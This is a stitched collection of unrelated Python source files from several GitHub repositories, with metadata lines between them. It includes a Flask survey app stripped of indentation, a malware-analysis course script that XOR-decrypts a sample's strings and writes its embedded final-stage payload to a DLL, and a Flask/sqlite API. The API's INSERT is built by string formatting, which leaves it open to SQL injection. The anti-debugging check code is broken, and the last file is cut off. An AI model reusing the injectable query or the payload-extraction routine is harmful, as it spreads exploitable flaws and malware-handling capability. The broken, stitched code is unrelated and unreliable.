@app.route('/formule')
def reponse():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
return render_template('formule.html', list_qst=list_qst, list_tache=list_tache)
@app.route('/questions', methods=['POST', 'GET'])
def questions():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
qst = request.form['qst']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(tache):
tache = list_tache[i]
break
i = i+1
file = open("db/questions.json", "w")
txt = {
"id": len(list_qst),
"question": qst,
"tache": tache
}
list_qst.append(txt)
file.write(json.dumps(list_qst, indent=True))
file.close()
return render_template('questions.html', list_qst=list_qst, list_tache=list_tache)
@app.route('/update_qst', methods=['POST', 'GET'])
def update_qst():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
id = request.form['id']
qst = request.form['qst']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(tache):
tache = list_tache[i]
break
i = i+1
i = 0
for q in list_qst:
if str(q['id']) == str(id):
list_qst[i]['question'] = qst
list_qst[i]['tache'] = tache
break
i = i+1
file = open("db/questions.json", "w")
file.write(json.dumps(list_qst, indent=True))
file.close()
return redirect('/questions')
@app.route('/taches', methods=['POST', 'GET'])
def taches():
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
tache = request.form['tache']
file = open("db/taches.json", "w")
txt = {
"id": len(list_tache),
"tache": tache
}
list_tache.append(txt)
file.write(json.dumps(list_tache, indent=True))
file.close()
return render_template('taches.html', list_tache=list_tache)
@app.route('/update_tache', methods=['POST', 'GET'])
def update_tache():
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
if request.method == 'POST':
id = request.form['id']
tache = request.form['tache']
i = 0
for t in list_tache:
if str(t['id']) == str(id):
list_tache[i]['tache'] = tache
break
i = i+1
file = open("db/taches.json", "w")
file.write(json.dumps(list_tache, indent=True))
file.close()
up_qst()
return redirect('/taches')
def up_qst():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
i = 0
for q in list_qst:
for t in list_tache:
if str(t['id']) == str(q['id']):
list_qst[i]['tache'] = t
i = i+1
file = open("db/questions.json", "w")
file.write(json.dumps(list_qst, indent=True))
file.close()
@app.route('/add_reponse', methods=['POST', 'GET'])
def add_reponse():
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
list_reponse = []
if os.path.exists("db/reponses.json") == True:
file = open("db/reponses.json", "r")
list_reponse = json.load(file)
file.close()
if request.method == 'POST':
resp = {}
resp['nom'] = request.form['nom']
resp['prenom'] = request.form['prenom']
nom = str(request.form['nom']).upper()+" " + \
str(request.form['prenom']).upper()
resp['sexe'] = request.form['sexe']
resp['profession'] = request.form['profession']
for t in list_tache:
for q in list_qst:
if str(t['id']) == str(q['tache']['id']):
resp['question_'+str(q['id'])] = q
tmp = 'resp'+str(q['id'])
resp['reponse_'+str(q['id'])] = request.form[tmp]
tmp = 'justif'+str(q['id'])
resp['justification_'+str(q['id'])] = request.form[tmp]
list_reponse.append(resp)
file = open("db/reponses.json", "w")
file.write(json.dumps(list_reponse, indent=True))
file.close()
return redirect('/success/'+nom)
else:
return redirect('/formule')
@app.route('/success/<nom>')
def success(nom):
return render_template('success.html', nom=nom)
@app.route('/getData', methods=['POST', 'GET'])
def chart():
res=[]
if request.method == 'POST':
list_reponse = []
if os.path.exists("db/reponses.json") == True:
file = open("db/reponses.json", "r")
list_reponse = json.load(file)
file.close()
list_qst = []
if os.path.exists("db/questions.json") == True:
file = open("db/questions.json", "r")
list_qst = json.load(file)
file.close()
list_tache = []
if os.path.exists("db/taches.json") == True:
file = open("db/taches.json", "r")
list_tache = json.load(file)
file.close()
for t in list_tache:
out = {}
out['tache'] = t['tache']
out['non'] = 0
out['oui'] = 0
for q in list_qst:
if str(q['tache']['id']) == str(t['id']):
id = str(q['id'])
for r in list_reponse:
if str(r['reponse_'+id]).lower() == "non":
out['non'] = out['non']+1
elif str(r['reponse_'+id]).lower() == "oui":
out['oui'] = out['oui']+1
res.append(out)
return json.dumps(res)
if __name__ == '__main__':
app.run(debug=True)
| yahyalazaar/audit_project | __init__.py | __init__.py | py | 7,848 | python | en | code | 0 | github-code | 36 |
7784263631 | import twitter
class pytwitter_forecast(NebriOS):
listens_to = ['forecast_date']
def check(self):
return True
def action(self):
auth = twitter.OAuth(shared.ttoken, shared.ttoken_secret, shared.tconsumer_key, shared.tconsumer_secret)
t = twitter.Twitter(auth=auth)
status = "Forecast: " + self.check_city_forecast + " is " + self.forecast_text + " with temperature "+ self.forecast_lo + " - " + self.forecast_hi + " °C for " + self.forecast_date
try:
t.account.verify_credentials()
try:
t.statuses.update(status=status)
# uncomment to update KVP of auth status for checking
#self.pytwitter_update = "Run"
except:
self.pytwitter_update = "Fail"
except:
self.pytwitter_auth = "Fail"
| bandono/nebri | tweet_rain/pytwitter_forecast.py | pytwitter_forecast.py | py | 874 | python | en | code | 0 | github-code | 36 |
39184736012 | ####################### IMPORT LIBRARIES ####################################
from pandas import ExcelFile, read_excel
from pandas import datetime
from sklearn.metrics import mean_squared_error
from math import sqrt
import matplotlib.pyplot as plt
import warnings
from hmmlearn.hmm import GaussianHMM
import numpy as np
import time
####################### FUNCTION TO READ FILE ################################
def readfile(coin_file, attribute):
''' Function to read and parse the data '''
# Read excel file
xls = ExcelFile(coin_file)
# Date parser
def parser(x):
try:
return datetime.strptime(str(x),'%Y-%m-%d %H:%M:%S')
except:
return datetime.strptime(str(x),'%Y-%m-%d')
series = read_excel(xls, attribute, header = 0, parse_dates =[0], index_col = 0, squeeze = True, date_parser = parser)
series = series.fillna(0)
# Store in array
X = series.values
return X
###################### FUNCTION TO SPLIT THE DATA INTO TRAINING AND TEST SET #######
def train_test_split(X, fraction):
''' Function to split the data into training and test set '''
# Train test split
size = int(len(X)*fraction)
train,test = X[0:size], X[size:len(X)]
return train,test
##################### FUNCTION TO DEFINE GAUSSIAN HIDDEN MARKOV MODEL ###############
def GaussHMM(n_comp,cov_type,n_itr,train,num_samples_test):
''' Function to define Gaussian Hidden Markov Model '''
# Reshape training data
history = train.reshape(-1,1)
# Gaussian hidden markov model
hmm = GaussianHMM(n_components = n_comp, covariance_type = cov_type, n_iter = n_itr)
with warnings.catch_warnings():
warnings.simplefilter('ignore')
hmm.fit(history)
# Generate samples
samples_test, _ = hmm.sample(num_samples_test)
return samples_test
###################### FUNCTION TO CALCULATE PREDICTIONS AND EXPECTATIONS #############
def pred_expect(test,variable, samples_test, pred, expect):
''' Function to calculate predictions and expectations '''
# Loop over test data
for i in range(len(test)):
# Integer values
if variable == 'int':
if round(samples_test[i][0]) < 0:
pred.append(0)
else:
pred.append(round(samples_test[i][0]))
# decimal values
else:
if samples_test[i][0] < 0:
pred.append(0)
else:
pred.append(samples_test[i][0])
expect.append(test[i])
return pred, expect
############################# FUNCTION TO CALCULATE RMSE ###############################
def rmse(coin_file, attribute,iterations,fraction,n_comp,cov_type,n_itr,var):
''' Function to calculate RMSE '''
X = readfile(coin_file,attribute)
train,test = train_test_split(X,fraction)
rmse_test = list()
for j in range(iterations):
######################## FOR FINAL RMSE ############################
pred = list()
expect = list()
num_samples_test = len(test) # number of samples to be generated
samples_test = GaussHMM(n_comp,cov_type,n_itr,train,num_samples_test)
pred,expect = pred_expect(test,var,samples_test, pred, expect)
rmse_test.append(sqrt(mean_squared_error(pred,expect)))
return rmse_test
##################### PRINT AVERAGE RMSE FOR TEST DATA #####################
coin_file = '4_RLC.xlsx' # Filename
attribute = 'exchange' # attribute
iterations = 30 # number of iterations for averaging rmse
fraction = 0.80 # Train - test split
n_comp = 7 # n_components for Gaussian HMM
cov_type = 'diag' # covariance_type for Gaussian HMM
n_itr = 1000 # n_iter for Gaussian HMM
var = 'float' # Integer or Float valued attribute
start = time.time()
rmse_test = rmse(coin_file, attribute,iterations,fraction,n_comp,cov_type,n_itr,var)
end = time.time()
print('The average RMSE over %d iterations is %.3f' %(iterations,np.array(rmse_test).mean()))
print('The time taken is %.3f seconds' %(end - start))
| srihari1212/bloqq | HMM/Docstring_HMM_test.py | Docstring_HMM_test.py | py | 4,173 | python | en | code | 0 | github-code | 36 |
20170707726 | from dumpulator import Dumpulator
from pwn import *
import inspect
import sys
"""
.rdata:010F3C7C xmmword_10F3C7C xmmword 0BACA7A0A1B6B4A5BAEAEFF6B5B1B1BDAh
.rdata:010F3C7C ; DATA XREF: dga+6Er
.rdata:010F3C8C xmmword_10F3C8C xmmword 2818CF8A0A988AAE2B4A7BAE8AAA6ABEh
.rdata:010F3C8C ; DATA XREF: dga+8Br
.rdata:010F3C9C word_10F3C9C dw 0EAh ; DATA XREF: dga+7Ar
.rdata:010F3C9E align 10h
.rdata:010F3CA0 ; const char Delimiter[2]
.rdata:010F3CA0 Delimiter db '\',0 ; DATA XREF: _main+2Eo
.rdata:010F3CA0 ; _main:loc_10E1EE2o
.rdata:010F3CA2 align 4
.rdata:010F3CA4 qword_10F3CA4 dq 13B6A6F6B6A60734h ; DATA XREF: sub_10E13A0+1Br
.rdata:010F3CAC dword_10F3CAC dd 87F657h ; DATA XREF: sub_10E13A0+30r
.rdata:010F3CB0 dword_10F3CB0 dd 720063h ; DATA XREF: sub_10E13A0+DFr
.rdata:010F3CB4 dword_10F3CB4 dd 6C0075h ; DATA XREF: sub_10E13A0+E6r
.rdata:010F3CB8 dword_10F3CB8 dd 61006Fh ; DATA XREF: sub_10E13A0+EEr
.rdata:010F3CBC dword_10F3CBC dd 650064h ; DATA XREF: sub_10E13A0+F6r
.rdata:010F3CC0 dword_10F3CC0 dd 72h ; DATA XREF: sub_10E13A0+FEr
.rdata:010F3CC4 qword_10F3CC4 dq 8EFE6F5FBFEFFF8Eh ; DATA XREF: sub_10E13A0+191r
.rdata:010F3CCC word_10F3CCC dw 9Fh ; DATA XREF: sub_10E13A0+189r
.rdata:010F3CCE align 10h
.rdata:010F3CD0 xmmword_10F3CD0 xmmword 61616161616161616161616161616161h
.rdata:010F3CD0 ; DATA XREF: sub_10E13A0+205r
.rdata:010F3CE0 xmmword_10F3CE0 xmmword 659B537ED2F05B7D47742A227C6FFE70h
.rdata:010F3CE0 ; DATA XREF: sub_10E1000+13r
.rdata:010F3CF0 ; Debug Directory entries
.rdata:010F3CF0 dd 0 ; Characteristics
.rdata:010F3CF4 dd 5EE8C20Ch ; TimeDateStamp: Tue Jun 16 12:58:52 2020
.rdata:010F3CF8 dw 0 ; MajorVersion
.rdata:010F3CFA dw 0 ; MinorVersion
.rdata:010F3CFC dd 0Dh ; Type: IMAGE_DEBUG_TYPE_POGO
.rdata:010F3D00 dd 268h ; SizeOfData
.rdata:010F3D04 dd rva aGctl ; AddressOfRawData
.rdata:010F3D08 dd 12BECh ; PointerToRawData
.rdata:010F3D0C dd 0 ; Characteristics
.rdata:010F3D10 dd 5EE8C20Ch ; TimeDateStamp: Tue Jun 16 12:58:52 2020
.rdata:010F3D14 dw 0 ; MajorVersion
.rdata:010F3D16 dw 0 ; MinorVersion
.rdata:010F3D18 dd 0Eh ; Type: IMAGE_DEBUG_TYPE_ILTCG
.rdata:010F3D1C dd 0 ; SizeOfData
.rdata:010F3D20 dd 0 ; AddressOfRawData
.rdata:010F3D24 dd 0 ; PointerToRawData
.rdata:010F3D28 __load_config_used dd 0B8h ; Size
.rdata:010F3D2C dd 0 ; Time stamp
.rdata:010F3D30 dw 2 dup(0) ; Version: 0.0
.rdata:010F3D34 dd 0 ; GlobalFlagsClear
.rdata:010F3D38 dd 0 ; GlobalFlagsSet
.rdata:010F3D3C dd 0 ; CriticalSectionDefaultTimeout
.rdata:010F3D40 dd 0 ; DeCommitFreeBlockThreshold
.rdata:010F3D44 dd 0 ; DeCommitTotalFreeThreshold
.rdata:010F3D48 dd 0 ; LockPrefixTable
.rdata:010F3D4C dd 0 ; MaximumAllocationSize
.rdata:010F3D50 dd 0 ; VirtualMemoryThreshold
.rdata:010F3D54 dd 0 ; ProcessAffinityMask
.rdata:010F3D58 dd 0 ; ProcessHeapFlags
.rdata:010F3D5C dw 0 ; CSDVersion
.rdata:010F3D5E dw 0 ; Reserved1
.rdata:010F3D60 dd 0 ; EditList
.rdata:010F3D64 dd offset ___security_cookie ; SecurityCookie
.rdata:010F3D68 dd offset ___safe_se_handler_table ; SEHandlerTable
.rdata:010F3D6C dd 3 ; SEHandlerCount
.rdata:010F3D70 dd offset ___guard_check_icall_fptr ; GuardCFCheckFunctionPointer
.rdata:010F3D74 dd 0 ; GuardCFDispatchFunctionPointer
.rdata:010F3D78 dd 0 ; GuardCFFunctionTable
.rdata:010F3D7C dd 0 ; GuardCFFunctionCount
.rdata:010F3D80 dd 100h ; GuardFlags
"""
def decrypt_one_string():
string="0x13B6A6F6B6A60734"
rez = ""
for i in range(2,len(string),2):
rez +=(chr(int(string[i:i+2][::-1],base=16)^ 0x1f ))
print(rez[::-1])
def decrypt_string_two():
string="0xE8FFFEFBF5F6EFE8F9"
rez = ""
for i in range(2,len(string),2):
rez +=(chr(int(string[i:i+2],base=16)^ 0x9A ))
print(rez[::-1])
def decrypt_string_three():
s1 = "0x7C6D1DBD1FEF1D5DDC6CCCBC5FEF891E"
s2 = "0x7CAD7CC86D1DDCAC1C4D1DEF0919FC"
rez = ""
rez2 = ""
for i in range(2,len(s1),2):
rez +=(chr(int(s1[i:i+2][::-1],base=16)^ 0xA2 ))
print(rez[::-1])
for i in range(2,len(s2),2):
rez2 +=(chr(int(s2[i:i+2][::-1],base=16)^ 0xA2 ))
print(rez2[::-1])
def decrypt_string_four():
"""
Fking decrypt this after finding where tf is isdebuggerpresent // peb->isprocessdebugged???
LABEL_16:
v21 = dword_10F6AA8;
}
else
{
while ( 1 )
{
v15 = String;
if ( *String == *v17 && *&String[4] == *(v17 + 4) && v35 == *(v17 + 8) )
break;
++v20;
++v17;
if ( v20 >= dwSize )
goto LABEL_16;
}
v1 = (v17 + 9);
v21 = dwSize - v20 - 9;
dword_10F6AA8 = v21;
}
v22 = 0;
if ( v21 && v21 >= 0x40 )
{
v23 = v1 + 32;
v17 = v21 & 0xFFFFFFC0;
do
{
v24 = *(v23 - 2);
v23 += 64;
v22 += 64;
*(v23 - 6) = _mm_xor_si128(xmmword_10F3CD0, v24);
*(v23 - 5) = _mm_xor_si128(*(v23 - 5), xmmword_10F3CD0);
*(v23 - 4) = _mm_xor_si128(*(v23 - 4), xmmword_10F3CD0);
*(v23 - 3) = _mm_xor_si128(*(v23 - 3), xmmword_10F3CD0);
}
while ( v22 < v17 );
}
for ( ; v22 < v21; ++v22 )
v1[v22] ^= 0x61u;
"""
v21 = 0
file = open(sys.argv[1],"rb")
v14 = file.read()
print(hexdump(v14[v14.index(b'redaolurc')+9:]))
s = ""
k = v14[v14.index(b'redaolurc')+9:]
print(type(k))
for i in k:
s+= chr(i ^ 0x61)
print("=======================================")
print(hexdump(s))
print("!!!!!!!!!!!!!!saving final stage to .dll file!!!!!!!!!!\n")
print("!!!!!!!!!!!!!!please stad by!!!!!!!!!!!!!!!!!!!!!!!\n")
z = open("final_stage_payload.dll","wb")
decrypted = bytearray()
for i in k:
decrypted.append(i ^ 0x61)
z.write(decrypted)
z.close()
file.close()
def decrypt_string_five():
s2="0x2818CF8A0A988AAE2B4A7BAE8AAA6ABE"
s1="0xBACA7A0A1B6B4A5BAEAEFF6B5B1B1BDA"
rez = ""
for i in range(2,len(s1),2):
rez +=(chr(int(s1[i:i+2][::-1],base=16)^ 0xC5 ))
print(rez[::-1])
rez2 = ""
for i in range(2,len(s2),2):
rez2 +=(chr(int(s2[i:i+2][::-1],base=16)^ 0xC5 ))
print(rez2[::-1])
def anti_analysis_decryption_check():
"""
bottom line is this :
659B537ED2F05B7D47742A227C6FFE70
this is actually an concatenation of the 4 byte hash-es which break down to
| 65 9B 53 7E |D2 F0 5B 7D |47 74 2A 22| 7C 6F FE 70
so by definition/ canonicall function call looks like this
sub_1351000(v3, v4, v5), where args are
003EF4A4 00715F38 &"C:\\Users\\pwn\\Desktop\\stage2_challenge_mal_analysis.dll" v5
003EF4A8 003EF580 v4
003EF4AC 00000000 v3
"""
dp = Dumpulator("2nd_stage.dmp")
prolog_start = 0x13510D0
prolog_stop = 0x135118A
crc_lookup_table = []
dp.start(begin=prolog_start,end=prolog_stop)
print(dir(dp))
print("!!!!!!!!!!!dumping crc lookup tablen!!!!!!!!\n")
print("!!!!!!please stand by!!!!!!!!\n")
for i in range(0,256):
iterator = i * 4
crc_lookup_table.append(hex(dp.read_ptr(0x1366290+iterator)))
#print(crc_lookup_table)
process_list_input = ["system","smss.exe","crss.exe",]
v7 = "s\x00y\x00s\x00t\x00e\00m\x00\x00"
v6 = len(v7)-1
v1 = v7[v6]
eax = "0xffffffff"
ctr_eax = 2
cnt_eax = 0
cnt_shift_idx_eax = 0
crn_shift_idx_eax = 2
res_tmp = ""
rez_final = 0
for j in range(0,v6):
if(cnt_shift_idx_eax == 4):
ctr_shift_idx_eax = 2
if(cnt_eax == 4):
ctr_eax = 2
print(eax[ctr_eax:ctr_eax+2])
cur_eax = int(eax[ctr_eax:ctr_eax+2],base=16)
print(cur_eax)
res_tmp = ord(v7[j]) ^ cur_eax
print(res_tmp)
shift_rez = cur_eax >> 8
print(shift_rez)
if(shift_rez == 0):
print("aci")
print(type(eax[crn_shift_idx_eax]))
print(eax[crn_shift_idx_eax])
print(eax[crn_shift_idx_eax+1])
eax = eax.replace(eax[crn_shift_idx_eax],"0").replace(eax[crn_shift_idx_eax+1],"0")
print(eax)
else:
print("aici2")
to_reaplace_one = hex(shift_rez)[2]
to_replace_two = hex(shift_rez)[3]
eax = eax.replace(eax[crn_shift_idx_eax],to_replace_one).replace(eax[crn_shft_idx_eax],to_replace_two)
print(eax)
print(hex(res_tmp))
rez_final = int(eax,base=16) ^ int(crc_lookup_table[res_tmp],base=16)
print(hex(rez_final))
eax=hex(rez_final)
ctr_eax+=2
cnt_eax+=1
crn_shift_idx_eax+=2
cnt_shift_idx_eax+=1
enc_process = "0x659B537ED2F05B7D47742A227C6FFE70"
for i in range(2,len(enc_process),8):
if(enc_process[i] != rez_final):
print(enc_process[i:i+8])
print("ye,we are not being debugged")
decrypt_string_four()
anti_analysis_decryption_check()
| SpiralBL0CK/ZERO2AUTO-CUSTOM-SAMPLE-SOLUTION | stage2_decrypt_strings_mal_analysis_corse.py | stage2_decrypt_strings_mal_analysis_corse.py | py | 10,493 | python | en | code | 0 | github-code | 36 |
18482541642 | import torch
import torch.nn as nn
import torch.nn.functional as F
from .utils import weight_reduce_loss
class FocalLoss(nn.Module):
def __init__(self,
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
reduction='mean',
loss_weight=1.0):
super(FocalLoss, self).__init__()
assert use_sigmoid is True, 'Only sigmoid focal loss supported now.'
self.use_sigmoid = use_sigmoid
self.gamma = gamma
self.alpha = alpha
self.reduction = reduction
self.loss_weight = loss_weight
def forward(self,
pred,
target,
weight=None,
avg_factor=None):
device = pred.device
assert pred.shape[0] == target.shape[0]
if len(target.shape) == 1:
target = torch.zeros(
pred.shape,
dtype=torch.long,
device=device).scatter_(
1, target.view(-1, 1), 1)
pred_sigmoid = pred.sigmoid()
pred_sigmoid = torch.clamp(pred_sigmoid, 1e-4, 1.0 - 1e-4)
target = target.type_as(pred)
pt = (1 - pred_sigmoid) * target + pred_sigmoid * (1 - target)
focal_weight = (self.alpha * target + (1 - self.alpha) *
(1 - target)) * pt.pow(self.gamma)
loss = F.binary_cross_entropy_with_logits(
pred, target, reduction='none') * focal_weight
loss = torch.where(torch.ne(target, -1.0),
loss, torch.zeros(loss.shape).to(device))
loss = self.loss_weight * weight_reduce_loss(
loss,
weight=weight,
reduction=self.reduction,
avg_factor=avg_factor)
return loss
| TWSFar/FCOS | models/losses/focal_loss.py | focal_loss.py | py | 1,798 | python | en | code | 1 | github-code | 36 |
16828444501 | from flask import Flask,request
import sqlite3
app = Flask(__name__)
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
curser.execute('create table if not exists students (sid integer primary key,name text,age integer,address text)')
connection.close()
@app.route('/student_details')
def details():
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
return {'students' : list(curser.execute('select * from students'))}
@app.route('/details',methods = ['POST'])
def register():
data = request.get_json()
connection = sqlite3.connect('sms.db')
curser = connection.cursor()
curser.execute("insert into students values('{},{},{},{}')".format(data['sid'],data['name'],data['age'],data['address']))
connection.commit()
connection.close()
return 'User Created Successfully.. '
app.run(port=5000) | mubarakdalvi/mubarakdalvi | studnt_management.py | studnt_management.py | py | 868 | python | en | code | 0 | github-code | 36 |
74612380905 | import tkinter
win = tkinter.Tk()
win.title("hanyb")
win.geometry("400x400+200+0")
# 菜单条
menubar = tkinter.Menu(win)
win.config(menu=menubar)
# 创建一个菜单选项
menu1 = tkinter.Menu(menubar, tearoff=False)
# 给菜单选项添加内容
for item in ["Python","R","C","C++","Java","shell","c#","JS","PHP","汇编","NodeJS","quit"]:
if item =="quit":
# 添加一个分隔线
menu1.add_separator()
menu1.add_command(label=item, command=win.quit)
else:
menu1.add_command(label=item)
# 向菜单条上添加菜单选项
menubar.add_cascade(label="语言", menu=menu1)
# 再创建一个菜单
menu2 = tkinter.Menu(menubar, tearoff=False)
menu2.add_command(label="red")
menu2.add_command(label="white")
menu2.add_command(label="black")
menubar.add_cascade(label="color", menu=menu2)
win.mainloop() | hanyb-sudo/hanyb | tkinter/tkinter组件/16、Menu顶层菜单.py | 16、Menu顶层菜单.py | py | 850 | python | en | code | 0 | github-code | 36 |
73532863784 | if __name__ is not None and "." in __name__:
from .SkylineParser import SkylineParser
from .SkylineVisitor import SkylineVisitor
from .Skyline import Skyline
else:
from SkylineParser import SkylineParser
from SkylineVisitor import SkylineVisitor
from Skyline import Skyline
class EvalVisitor(SkylineVisitor):
def __init__(self):
self.identifiers = {}
def visitRoot(self, ctx: SkylineParser.RootContext):
l = [n for n in ctx.getChildren()]
return self.visit(l[0])
def visitStart(self, ctx: SkylineParser.StartContext):
l = [n for n in ctx.getChildren()]
if len(l) == 1:
return self.visit(l[0])
elif len(l) == 3:
identifier = l[0].getText()
skyline = self.visit(l[2])
self.identifiers[identifier] = skyline
return skyline
def visitSkyline(self, ctx: SkylineParser.SkylineContext):
l = [n for n in ctx.getChildren()]
return self.visit(l[0])
def visitPriority1(self, ctx: SkylineParser.Priority1Context):
l = [n for n in ctx.getChildren()]
skyline = self.visit(l[0])
if len(l) >= 3:
for i in range(2, len(l), 2):
if hasattr(l[i], 'getRuleIndex'):
skyline.union(self.visit(l[i]))
else:
if l[i - 1].getText() == '+':
skyline.right_shift(int(l[i].getText()))
else:
skyline.left_shift(int(l[i].getText()))
return skyline
def visitPriority2(self, ctx: SkylineParser.Priority2Context):
l = [n for n in ctx.getChildren()]
skyline = self.visit(l[0])
if len(l) >= 3:
for i in range(2, len(l), 2):
if hasattr(l[i], 'getRuleIndex'):
skyline.intersection(self.visit(l[i]))
else:
skyline.replication(int(l[i].getText()))
return skyline
def visitPriority3(self, ctx: SkylineParser.Priority3Context):
l = [n for n in ctx.getChildren()]
skyline = self.visit(l[len(l) - 1])
if len(l) == 2:
skyline.mirror()
return skyline
def visitPriority4(self, ctx: SkylineParser.Priority4Context):
l = [n for n in ctx.getChildren()]
if len(l) == 3:
return self.visit(l[1])
else:
return self.visit(l[0])
def visitIdentifier(self, ctx: SkylineParser.IdentifierContext):
identifier = ctx.getText()
return self.identifiers[identifier]
def visitBuilding(self, ctx: SkylineParser.BuildingContext):
l = [n for n in ctx.getChildren()]
skyline = Skyline()
skyline.building(int(l[1].getText()), int(l[3].getText()), int(l[5].getText()))
return skyline
def visitComposed(self, ctx: SkylineParser.ComposedContext):
l = [n for n in ctx.getChildren()]
skyline = self.visit(l[1])
if len(l) >= 5:
for i in range(3, len(l) - 1, 2):
skyline.union(self.visit(l[i]))
return skyline
def visitRandom(self, ctx: SkylineParser.RandomContext):
l = [n for n in ctx.getChildren()]
skyline = Skyline()
skyline.random(int(l[1].getText()), int(l[3].getText()), int(l[5].getText()), int(l[7].getText()), int(l[9].getText()))
return skyline
| anunez0/SkylineBot | cl/EvalVisitor.py | EvalVisitor.py | py | 3,416 | python | en | code | 0 | github-code | 36 |
31065907035 | students = ['Mosh', 'musa', 'uthman', 'khalil', 'mustafa']
for s in students:
print(s)
numbers = [1, 2, 3, 45, 66, 55, 9, 900]
sum = 0
for n in numbers:
sum = sum + n
print(sum)
name = 'Uthman'
for s in name:
print(s)
number = [1, -2, -9, 8, 7, -6]
for n in number:
if n >=0:
print(n)
| itcentralng/python-class-july-2022 | Practice/Bukar/aug17_bukar.py | aug17_bukar.py | py | 320 | python | en | code | 0 | github-code | 36 |
8573106133 | total = 0
count = 0
while True :
inp = input('Enter Number: ')
if inp == 'done' : break
value = float(inp)
total = total + value
count = count + 1
average = total / count
print('Average:', average)
#This is a loop that takes the average of a bunch of
#numbers, and then spits out the total, but can be done
#better using a list
numlist = list()
#create a list
while True :
inp2 = input('Enter a number: ')
if inp2 == 'DONE' : break
valuu = float(inp2)
#input same code as before
numlist.append(valuu)
#rather than add to count, just append the list
avg = sum(numlist) / len(numlist)
#do regular commands to the list to make an avg sum/len
print('Your average is:' , avg)
#Instead of having to construct a count and total number,
#the list just does that for you, and you can just focus on
#getting the average by messing with the list rather than
#constructing a lot of attached strings | BunggoyLearn/Test | Averager.py | Averager.py | py | 935 | python | en | code | 0 | github-code | 36 |
38072060455 | from migen import *
from migen.genlib.resetsync import AsyncResetSynchronizer
from litex.soc.cores.clock import *
from litex.soc.interconnect.csr import *
from litex.soc.cores.prbs import PRBSTX, PRBSRX
from litex.soc.cores.code_8b10b import Encoder, Decoder
from liteiclink.transceiver.gtx_7series_init import GTXTXInit, GTXRXInit
from liteiclink.transceiver.clock_aligner import BruteforceClockAligner
from liteiclink.transceiver.common import *
from liteiclink.transceiver.prbs import *
class GTXChannelPLL(Module):
def __init__(self, refclk, refclk_freq, linerate):
self.refclk = refclk
self.reset = Signal()
self.lock = Signal()
self.config = self.compute_config(refclk_freq, linerate)
@staticmethod
def compute_config(refclk_freq, linerate):
for n1 in 4, 5:
for n2 in 1, 2, 3, 4, 5:
for m in 1, 2:
vco_freq = refclk_freq*(n1*n2)/m
if 1.6e9 <= vco_freq <= 3.3e9:
for d in 1, 2, 4, 8, 16:
current_linerate = vco_freq*2/d
if current_linerate == linerate:
return {"n1": n1, "n2": n2, "m": m, "d": d,
"vco_freq": vco_freq,
"clkin": refclk_freq,
"linerate": linerate}
msg = "No config found for {:3.2f} MHz refclk / {:3.2f} Gbps linerate."
raise ValueError(msg.format(refclk_freq/1e6, linerate/1e9))
def __repr__(self):
r = """
GTXChannelPLL
==============
overview:
---------
+--------------------------------------------------+
| |
| +-----+ +---------------------------+ +-----+ |
| | | | Phase Frequency Detector | | | |
CLKIN +----> /M +--> Charge Pump +-> VCO +---> CLKOUT
| | | | Loop Filter | | | |
| +-----+ +---------------------------+ +--+--+ |
| ^ | |
| | +-------+ +-------+ | |
| +----+ /N2 <----+ /N1 <----+ |
| +-------+ +-------+ |
+--------------------------------------------------+
+-------+
CLKOUT +-> 2/D +-> LINERATE
+-------+
config:
-------
CLKIN = {clkin}MHz
CLKOUT = CLKIN x (N1 x N2) / M = {clkin}MHz x ({n1} x {n2}) / {m}
= {vco_freq}GHz
LINERATE = CLKOUT x 2 / D = {vco_freq}GHz x 2 / {d}
= {linerate}GHz
""".format(clkin=self.config["clkin"]/1e6,
n1=self.config["n1"],
n2=self.config["n2"],
m=self.config["m"],
vco_freq=self.config["vco_freq"]/1e9,
d=self.config["d"],
linerate=self.config["linerate"]/1e9)
return r
class GTXQuadPLL(Module):
def __init__(self, refclk, refclk_freq, linerate):
self.clk = Signal()
self.refclk = Signal()
self.reset = Signal()
self.lock = Signal()
self.config = self.compute_config(refclk_freq, linerate)
# DRP
self.drp = DRPInterface()
# # #
fbdiv_ratios = {
16: 1,
20: 1,
32: 1,
40: 1,
64: 1,
66: 0,
80: 1,
100: 1
}
fbdivs = {
16: 0b0000100000,
20: 0b0000110000,
32: 0b0001100000,
40: 0b0010000000,
64: 0b0011100000,
66: 0b0101000000,
80: 0b0100100000,
100: 0b0101110000
}
self.specials += \
Instance("GTXE2_COMMON",
p_QPLL_CFG=0x0680181 if self.config["vco_band"] == "upper" else
0x06801c1,
p_QPLL_FBDIV=fbdivs[self.config["n"]],
p_QPLL_FBDIV_RATIO=fbdiv_ratios[self.config["n"]],
p_QPLL_REFCLK_DIV=self.config["m"],
i_GTREFCLK0=refclk,
i_QPLLRESET=self.reset,
o_QPLLOUTCLK=self.clk,
o_QPLLOUTREFCLK=self.refclk,
i_QPLLLOCKEN=1,
o_QPLLLOCK=self.lock,
i_QPLLREFCLKSEL=0b001,
i_DRPADDR=self.drp.addr,
